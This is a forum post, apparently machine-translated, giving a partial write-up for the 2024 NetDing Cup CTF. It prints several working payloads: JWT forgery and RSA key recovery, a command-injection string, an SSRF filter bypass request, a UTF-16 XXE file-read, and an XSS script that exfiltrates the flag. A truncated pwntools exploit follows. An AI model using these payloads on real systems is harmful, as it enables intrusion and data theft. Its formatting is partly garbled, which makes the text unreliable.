Jump to content

Title: 2024 4th NetDing Cup Partial Competition Group WP

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

1. Qinglong Group WEB

web1

You can log in at the beginning, and after logging in, a token and a session are generated, one is jwt and the other is flask framework

This is the original question forged jwt first.

CTFtime.org/DownUnderCTF 2021 (Online)/JWT/Writeup

Create two tokens, and then use the rsa_sign2n tool to generate the public key

python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWFhIn0.EnToBP4kzW6jbUqkC7fjt-FcCq9mOMhKWRqKpo12BsG464YTX2QNiBLuzgqJhnDlGF2Ukqb6oWXhFm0qiKrbg1skUb0FO2kMBkEvRLpyGJ7tXOzcndGDl-egaMa-mSN321RNW-aiCKJsij5Tf0HzQgBU8UCg1Zd8uJaybcj3oXOi eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEifQ.IUanU3g_ZtyPjDnOJ9gockfRo1oOQLmQT0To_WYLi9I9PluHxbBId5d2wFiF-sIhGPuDtzPvShiE1ao0qnMlp3X7pVf-Qb-juaslvbnpR1rCKH2D3Kq4u1d2wEDvsgWVtjYA6s5NXrvJpzDcpZlzmx_6Ywn8caqVQ3kjlTv87OKO img

Get public key

-----BEGIN PUBLIC KEY----

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv

IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN

MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502

ZMSv0AxMgN5UMh9FCwIDAQAB

-----END PUBLIC KEY------ Then use RsaCtfTool to get the private key

img

-----BEGIN RSA PRIVATE KEY-----

MIICoQIBAAKBgSSlUMfCzg/ysG4ixoi6NKGuWNnvIpZZTRNa045eH2xzzY/ZyRwD

ojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fANMNCYRa47xIW0RwZBDSABcGnw

u3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502ZMSv0AxMgN5UMh9FCwIDAQAB

AoGBC5/r+nCv2+uWXTjL8i6UJtLIfdOssxKbJNiIKLXQh3l8IAAfx1i9ktxYEICW

TcGTUkx9gjd+xUwo0KOKjcg3hZc7bEfLkiOsK8dSwsPFEXYQpCE1EFokhkc9Rbiq

URC9QIrQjtzf5vdU2usj5ddRGtqtmpXm/ibU1TLPIsy8Y5TJAoGBAP2Mj8b+pnwu

SCp0EYh99ogr6jblQlVwySv34UDQarcFjkQoB60SOMZpGCyPr/auhfDIsNvKyXLK

S7IBEBFMETWywUx28OGFV7xtGF7RfLWmaKYXy4ML/DfHonV8khZ6h5wpyxPL3Wli

uJCSSsjNgXhj4aeGLtRRuySpiXflrdFvAgElAoGBALrhzOO+tJWZQ2XPMVEqjvjl

bXfS2WbCf/Theuzb8Zw/AxJncuj1IlXUBpZpvigTkPPd6MXIHV13j/1+3QnyyEiN

Hf6vOHLxZq6itrDEtafqJP4vUbigr+GpSqxQChl5bNUE1QMdY3AW7LTarzZ8iq5i

6GMi+wdRyp+GOqXd65UPAgERAoGAUjts5pfHSt6T8hfOVcf87eS6qgUqRTlWAGwR

tCfrQkb9tT1qRfgSadzlPuJ+QirDqAm80amNcVZdvTDG8NpmckfP/R+oEcphpOUc

qSFY4PezPMlyb7DcLcQ0sHttpmztthtkdR+GFFdedBPFOjTQC16qDNGSpbmkepfZ

jqta99E=

-----END RSA PRIVATE KEY------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

You can access the game routing function, here is the original question abroad

AIS3-pre-exam-2024-Writeup | Naup's Blog

Use emo expression to construct cd flag;p:|cat *

Read the source code directly and you can get the secret_key of 36f8efbea152e50b23290e0ed707b4b0

Then just forge it

img

Then you can use the function of uploading files. Let's first audit the source code of this part.

@app.route('/upload', methods=['GET', 'POST'])

def upload():

token=request.cookies.get('token')

If not token:

flash('Please login first', 'warning')

return redirect(url_for('login'))

payload=decode_jwt(token)

form=UploadForm()

if not payload or payload['username'] !='admin':

error_message='You do not have permission to access this page.Your username is not admin.'

return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])

if not session['role'] or session['role'] !='admin':

error_message='You do not have permission to access this page.Your role is not admin.'

return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])

if form.validate_on_submit():

file=form.avatar.data

if file:

filename=secure_filename(file.filename)

files={'file': (filename, file.stream, file.content_type)}

php_service_url='http://127.0.0.1/upload.php'

response=requests.post(php_service_url, files=files)

if response.status_code==200:

flash(response.text, 'success')

else:

flash('Failed to upload file to PHP service', 'danger')

return render_template('upload.html', form=form)

@app.route('/view_uploads', methods=['GET', 'POST'])

def view_uploads():

token=request.cookies.get('token')

form=GameForm()

If not token:

error_message='Please login first'

return render_template('view_uploads.html', form=form, error_message=error_message)

payload=decode_jwt(token)

if not payload:

error_message='Invalid or expired token. Please login again.'

return render_template('view_uploads.html', form=form, error_message=error_message)

if not payload['username']=='admin':

error_message='You do not have permission to access this page.Your username is not admin'

return render_template('view_uploads.html', form=form, error_message=error_message)

user_input=None

if form.validate_on_submit():

filepath=form.user_input.data

pathurl=request.form.get('path')

if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):

error_message='www.testctf.com must in path and /var/www/html/uploads/must in filepath.'

return render_template('view_uploads.html', form=form, error_message=error_message)

params={'s': filepath}

try:

response=requests.get('http://'+pathurl, params=params, timeout=1)

return render_template('view_uploads.html', form=form, user_input=response.text)

except:

error_message='500! Server Error'

return render_template('view_uploads.html', form=form, error_message=error_message)

return render_template('view_uploads.html', form=form, user_input=user_input) There is a php service on port 80, and then the /upload route can upload files to the uplaods directory. You can view them under the view_uploads route, but there is a waf

if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath): This domain name must be included here, and it cannot be 127.0.0.1. Then 0.0.0 can be used instead of 127.0.0.1, and the jump in ssrf can be used to bypass the domain name limit

POST /view_uploads HTTP/1.1

Host: 0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 211

Origin: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732

Connection: close

Referer: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732/view_uploads

Cookie: session=eyJjc3JmX3Rva2VuIjoiYmQyNTJlZDZlYTQ5ZmJmOWQyZjJjMmQ0YTBlNjc1YzJhYzlmNmU5MyIsInJvbGUiOiJhZG1pbiJ9.ZyBmXg.eLZ3Z69hYgP6lG3vjiMNsKTLCno; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.DNqIFNdFOWgGGnuk95SQa5GdU_D6TDv95lTU97wUP8ekgqX6zrnvvsnp8XkvVfSx0g3xVQqbo5xhdxjNpM8LiiwX_kQ8FO8t0q0qBn1RJ5O2bGkGOZsUWAUrKg7ME6L4-XFiXi7P328f1t4En_kSp91SeS7-9Lcn7Ja__IJbRuH1

Upgrade-Insecure-Requests: 1

Priority: u=0, i

csrf_token=ImJkMjUyZWQ2ZWE0OWZiZjlkMmYyYzJkNGEwZTY3NWMyYWM5ZjZlOTMi.ZyBmag.RCasLc0XUU8ep682nDtSZ5PeqsQpath=www.testctf.com@0.0.0.0user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8submit=Submit Then you can upload a file first and then read it. If you find that it will report Failed to load XML File, guess it will parse xml and directly hit xxe, but filter many keywords such as system, so use utf-16 encoding to bypass it and directly read the flag.php file

?xml version='1.0' ?

!DOCTYPE replace [!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=/var/www/html/flag.php' ]

userInfo

firstNameJohn/firstName

lastNameexample;/lastName

/userInfoiconv -f utf8 -t utf16 1.xml3.xml

Then upload 3.xml, then read it to get flag

img

web2

Open a login interface for the container, enter the account password at will and enter the vulnerability interface.

Here is a function to send to boss, at a glance xss

Then access /flag, and the boss needs to access it. Here we can submit an xss, and then let the boss access /flag first, and then bring the data to our content

scriptvar xmlhttp=new XMLHttpRequest();

xmlhttp.withCredentials=true;

xmlhttp.onreadystatechange=function() {

if (xmlhttp.readyState==4 xmlhttp.status==200) {

var flagData=xmlhttp.responseText;

var flag1=btoa(flagData);

var remoteServerUrl='/content/4a95828e3f0037bfe446ae0e693912df';

var xmlhttp2=new XMLHttpRequest();

xmlhttp2.open('POST', remoteServerUrl, true);

xmlhttp2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

xmlhttp2.send('content=' + encodeURIComponent(flag1))

}

};

xmlhttp.open('GET', '/flag', true);

xmlhttp.send();/script img

After updating the task, send it to the boss

img

Then go back to the page and see that the flag has been sent

img

PWN

PWN2

Image

Start with a login function, and then you can enter as long as you get the username and password.

Image

The vuln function has two bytes overflow, and the address of buf is leaked.

Image

Also gave us the backdoor function and /bin/sh string

Image

Image

Complete exp

from pwn import *

elf=ELF('./short')

context(arch=elf.arch, os=elf.os)

context.log_level='debug'

# libc=ELF('./libc.so.6')

flag=0

url='0192d6093a297e5e9de02a5fc5bb4757.tdfi.dg01.ciihw.cn'

po

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.